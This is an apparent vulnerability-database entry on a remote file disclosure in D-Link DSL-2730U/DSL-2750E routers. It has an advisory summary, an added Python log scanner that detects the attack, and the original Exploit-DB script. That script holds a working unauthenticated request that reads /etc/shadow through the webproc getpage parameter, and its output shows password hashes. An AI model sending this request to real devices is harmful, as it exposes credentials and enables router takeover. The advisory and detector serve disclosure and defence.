Vendor: DSL-2730U/DSL-2750E
By: Todor Donev
CVSS: 7.5 (HIGH)
Type: Remote File Disclosure
CWE: 200
Product Name: DSL-2730U/DSL-2750E
Affected Version From: IN_1.02/SEA_1.04/SEA_1.07
Affected Version To: IN_1.02/SEA_1.04/SEA_1.07
Patch Exists: YES
Related CWE: N/A
CPE: h:d-link:dsl-2730u
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

D-Link ADSL ROUTER DSL-2730U IN_1.02 Remote File Disclosure

A vulnerability in D-Link ADSL ROUTER DSL-2730U IN_1.02 allows an unauthenticated attacker to remotely disclose sensitive files on the device. By sending a specially crafted HTTP request to the device's web interface (the getpage parameter of /cgi-bin/webproc, as in the request under "Exploit-DB raw data"), an attacker can access the /etc/shadow file, which contains the hashed passwords of all users on the device. This vulnerability affects D-Link DSL-2730U/DSL-2750E devices running firmware version IN_1.02/SEA_1.04/SEA_1.07.

Mitigation:

Users should update their devices to the latest firmware version available from the vendor.
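
A detection check for the request described above, added here as an example (it is not part of the original advisory or of the Exploit-DB entry): it scans HTTP log lines for /cgi-bin/webproc requests whose getpage or errorpage value resolves outside html/. The html/ allow-list prefix, the Common Log Format input and the sample lines are assumptions constructed for this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate values sit under html/ (like errorpage=html/main.html on this page).
ALLOWED_PREFIX = "html/"
PAGE_PARAMS = ("getpage", "errorpage")
# Assumption: Common Log Format lines from a proxy or sensor in front of the router.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded separators are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(request_target):
    """Return (param, decoded value) pairs on webproc that resolve outside html/."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/cgi-bin/webproc"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    hits = []
    for name in PAGE_PARAMS:
        for value in map(fully_decode, query.get(name, [])):
            resolved = posixpath.normpath(value)  # collapses ./ and ../ segments
            if "\x00" in value or not resolved.startswith(ALLOWED_PREFIX):
                hits.append((name, value))
    return hits

def scan(lines):
    """Return (client, param, value) for every flagged request in the log lines."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if match:
            client, target = match.groups()
            findings += [(client, p, v) for p, v in suspicious_params(target)]
    return findings

# Constructed sample lines (documentation IP ranges); the second mirrors the page's request.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/webproc?getpage=html/main.html&var:menu=setup HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard HTTP/1.1" 200 212',
]
```

Calling scan(SAMPLE_LOG) returns one finding, for the second line; a hit that also received a 200 response from an affected firmware version is a reason to rotate the device passwords after updating.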

Exploit-DB raw data:

#!/bin/sh
# 
#  D-Link ADSL ROUTER DSL-2730U IN_1.02
#  Remote File Disclosure
#
#  Modem Name:               DSL-2730U/DSL-2750E
#  Time and Date:            2012-05-23 09:51:16
#  HardwareVersion:          U1
#  Firmware Version:         IN_1.02/SEA_1.04/SEA_1.07
# 
#  Copyright 2016 (c) Todor Donev 
#  <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  Thanks to Maya Hristova that support me.  

[todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
#  #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::